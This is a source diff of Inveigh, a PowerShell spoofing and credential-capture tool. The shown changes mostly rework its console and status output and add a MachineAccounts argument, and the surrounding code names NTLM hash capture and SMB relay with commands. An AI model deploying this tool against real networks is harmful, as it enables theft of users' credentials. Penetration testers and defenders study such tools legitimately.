$inveigh.log.add("$(Get-Date -format 's') - Inveigh auto-exited")
if($inveigh.file_output)
@@ -1667,61 +1748,22 @@ $sniffer_scriptblock =
{
if($inveigh.status_output)
{
- $inveigh.host.ui.WriteWarningLine("SSL Certificate Deletion Error - Remove Manually")
- $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+ $inveigh.console_queue.add("SSL Certificate Deletion Error - Remove Manually")
}
+ $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
+
if($inveigh.file_output)
{
"$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"| Out-File $Inveigh.log_out_file -Append
}
}
}
+
+ $inveigh.running = $false
+
}
}
-
- while(($inveigh.console_queue.Count -gt 0) -and ($inveigh.console_output))
- {
- switch -wildcard ($inveigh.console_queue[0])
- {
- "*local administrator*"
- {
- $inveigh.host.ui.WriteWarningLine($inveigh.console_queue[0])
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "*NTLMv1 challenge/response written*"
- {
- if($inveigh.file_output)
- {
- $inveigh.host.ui.WritewarningLine($inveigh.console_queue[0])
- }
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "*NTLMv2 challenge/response written*"
- {
- if($inveigh.file_output)
- {
- $inveigh.host.ui.WritewarningLine($inveigh.console_queue[0])
- }
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "* relay *"
- {
- $inveigh.host.ui.WriteWarningLine($inveigh.console_queue[0])
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "Service *"
- {
- $inveigh.host.ui.WriteWarningLine($inveigh.console_queue[0])
- $inveigh.console_queue.RemoveRange(0,1)
- }
- default
- {
- $inveigh.host.ui.WriteLine($inveigh.console_queue[0])
- $inveigh.console_queue.RemoveRange(0,1)
- }
- }
- }
if($inveigh.file_output)
{
@@ -1743,7 +1785,6 @@ $sniffer_scriptblock =
$inveigh.NTLMv2_file_queue.RemoveRange(0,1)
}
}
-
}
}
@@ -1779,7 +1820,8 @@ Function HTTPListener()
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument(
$SMBRelay).AddArgument($SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument(
- $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($Repeat).AddArgument($ForceWPADAuth) > $null
+ $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($Repeat).AddArgument(
+ $MachineAccounts).AddArgument($ForceWPADAuth) > $null
$HTTP_handle = $HTTP_powershell.BeginInvoke()
}
@@ -1796,7 +1838,7 @@ Function SnifferSpoofer()
$sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(
$NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
$LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($Repeat).AddArgument(
- $ForceWPADAuth).AddArgument($RunTime) > $null
+ $MachineAccounts).AddArgument($ForceWPADAuth).AddArgument($RunTime) > $null
$sniffer_handle = $sniffer_powershell.BeginInvoke()
}
@@ -1812,6 +1854,76 @@ if(($inveigh.HTTP) -or ($inveigh.HTTPS))
# Sniffer/Spoofer Start - always enabled
SnifferSpoofer
+
+if($inveigh.console_output)
+{
+
+ :console_loop while(($inveigh.running) -and ($inveigh.console_output))
+ {
+ while($inveigh.console_queue.Count -gt 0)
+ {
+ if($inveigh.output_stream_only)
+ {
+ write-output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ else
+ {
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+ "*local administrator*"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv1 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv2 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "* relay *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "Service *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ default
+ {
+ write-output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ }
+ }
+ }
+
+ if($inveigh.console_input)
+ {
+ if([console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+ }
+
+ Start-Sleep -m 5
+ }
+}
+
}
#End Invoke-Inveigh
@@ -1833,8 +1945,8 @@ Function Stop-Inveigh
$inveigh.HTTP_listener.Close()
}
- Write-Warning "Inveigh exited at $(Get-Date -format 's')"
- $inveigh.log.add("$(Get-Date -format 's') - Inveigh exited")|out-null
+ $inveigh.status_queue.add("Inveigh exited at $(Get-Date -format 's')")|Out-Null
+ $inveigh.log.add("$(Get-Date -format 's') - Inveigh exited")|Out-Null
if($inveigh.file_output)
{
@@ -1843,7 +1955,7 @@ Function Stop-Inveigh
}
else
{
- Write-Warning "Inveigh isn't running"
+ $inveigh.status_queue.add("Inveigh isn't running") | Out-Null
}
if($inveigh.HTTPS)
@@ -1860,19 +1972,49 @@ Function Stop-Inveigh
}
catch
{
- Write-Warning "SSL Certificate Deletion Error - Remove Manually"
- $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")|out-null
+ $inveigh.status_queue.add("SSL Certificate Deletion Error - Remove Manually")|Out-Null
+ $inveigh.log.add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")|Out-Null
if($inveigh.file_output)
{
- "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"| Out-File $Inveigh.log_out_file -Append
+ "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually"|Out-File $Inveigh.log_out_file -Append
}
}
}
}
else
{
- Write-Warning "Inveigh isn't running"
+ $inveigh.status_queue.add("Inveigh isn't running")|Out-Null
+ }
+
+ while($inveigh.status_queue.Count -gt 0)
+ {
+ if($inveigh.output_stream_only)
+ {
+ write-output($inveigh.status_queue[0] + $inveigh.newline)
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ else
+ {
+ switch -wildcard ($inveigh.status_queue[0])
+ {
+ "Inveigh exited at *"
+ {
+ write-warning $inveigh.status_queue[0]
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ "SSL Certificate Deletion Error - Remove Manually"
+ {
+ write-warning $inveigh.status_queue[0]
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ default
+ {
+ write-output $inveigh.status_queue[0]
+ $inveigh.status_queue.RemoveRange(0,1)
+ }
+ }
+ }
}
}
@@ -1884,43 +2026,51 @@ Function Get-Inveigh
#>
while($inveigh.console_queue.Count -gt 0)
{
- switch -wildcard ($inveigh.console_queue[0])
+ if($inveigh.output_stream_only)
{
- "*local administrator*"
- {
- write-warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "*NTLMv1 challenge/response written*"
- {
- if($inveigh.file_output)
- {
- write-warning $inveigh.console_queue[0]
- }
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "*NTLMv2 challenge/response written*"
- {
- if($inveigh.file_output)
- {
- write-warning $inveigh.console_queue[0]
- }
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "* relay *"
- {
- write-warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
- }
- "Service *"
- {
- write-warning $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
- }
- default
+ write-output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ else
+ {
+ switch -wildcard ($inveigh.console_queue[0])
{
- write-output $inveigh.console_queue[0]
- $inveigh.console_queue.RemoveRange(0,1)
+ "*local administrator*"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv1 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv2 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "* relay *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "Service *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ default
+ {
+ write-output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
}
}
}
@@ -1977,24 +2127,87 @@ Function Watch-Inveigh
{
<#
.SYNOPSIS
- Watch-Inveigh will enabled real time console output.
+ Watch-Inveigh will enabled real time console output. If using this cmdlet through a shell, test to ensure that it doesn't hang the shell.
#>
- if($inveigh)
+ if($inveigh.tool -ne 1)
{
- $inveigh.console_output = $true
- }
-}
+ if($inveigh.running)
+ {
+ Write-Output "Press any key to stop real time console output"
+ $inveigh.console_output = $true
-Function Hide-Inveigh
-{
- <#
- .SYNOPSIS
- Hide-Inveigh will disable real time console output.
- #>
- if($inveigh)
+ :console_loop while(($inveigh.running) -and ($inveigh.console_output))
+ {
+ while($inveigh.console_queue.Count -gt 0)
+ {
+ if($inveigh.output_stream_only)
+ {
+ write-output($inveigh.console_queue[0] + $inveigh.newline)
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ else
+ {
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+ "*local administrator*"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv1 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "*NTLMv2 challenge/response written*"
+ {
+ if($inveigh.file_output)
+ {
+ write-warning $inveigh.console_queue[0]
+ }
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "* relay *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ "Service *"
+ {
+ write-warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ default
+ {
+ write-output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveRange(0,1)
+ }
+ }
+ }
+ }
+
+ if([console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ Start-Sleep -m 5
+ }
+ }
+ else
+ {
+ Write-Output "Inveigh isn't running"
+ }
+ }
+ else
{
- $inveigh.console_output = $false
+ Write-Output "Watch-Inveigh cannot be used with current external tool selection"
}
+
}
Function Clear-Inveigh
@@ -2012,11 +2225,17 @@ Function Clear-Inveigh
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = @()
+ $inveigh.SMBRelay_failed_list = @()
}
}
Function Get-InveighHelp
{
+ <#
+ .SYNOPSIS
+ Get-InveighHelp will cmdlet list.
+ #>
"-"*26 + "(Get-InveighHelp)" + "-"*26 | Write-Output
write-output "Invoke-Inveigh - Start Inveigh with or without parameters"
write-output "Get-Inveigh - Get queued console output"
@@ -2026,7 +2245,6 @@ Function Get-InveighHelp
write-output "Get-InveighNTLMv2 - Get captured NTLMv2 challenge/response hashes"
write-output "Get-InveighStats - Get captured challenge/response counts"
write-output "Watch-Inveigh - Enable real time console output"
- write-output "Hide-Inveigh - Disable real time console output"
write-output "Clear-Inveigh - Clear capture, log, smbrelay, and spoof lists"
write-output "Stop-Inveigh - Stop Inveigh"
"-"*69 | Write-Output
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-31 21:41:27 +0000